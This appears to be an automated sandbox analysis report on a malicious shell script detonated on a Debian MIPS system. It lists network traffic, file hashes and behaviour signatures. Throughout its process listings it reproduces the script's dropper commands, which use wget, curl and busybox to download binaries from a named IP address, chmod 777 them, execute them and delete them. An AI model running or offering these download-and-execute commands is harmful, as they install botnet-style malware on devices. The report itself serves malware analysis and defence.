[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/757-1-0xb6697000-0xb66a8044-memory.dmp

memory/779-2-0xb6775000-0xb6786044-memory.dmp

memory/895-3-0xb66d0000-0xb66e1044-memory.dmp

memory/907-4-0xb66f4000-0xb6705044-memory.dmp

memory/915-5-0xb672a000-0xb673b044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-14 02:42

Reported

2024-11-14 02:44

Platform

debian9-mipsbe-20240418-en

Max time kernel

71s

Max time network

73s

Command Line

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC N/A
N/A /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ N/A
N/A /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q N/A
N/A /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 N/A
N/A /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 N/A
N/A /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m N/A
N/A /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J N/A
N/A /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O N/A
N/A /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB N/A
N/A /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 N/A
N/A /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O N/A
N/A /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz N/A
N/A /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE N/A
N/A /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A

Processes

/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

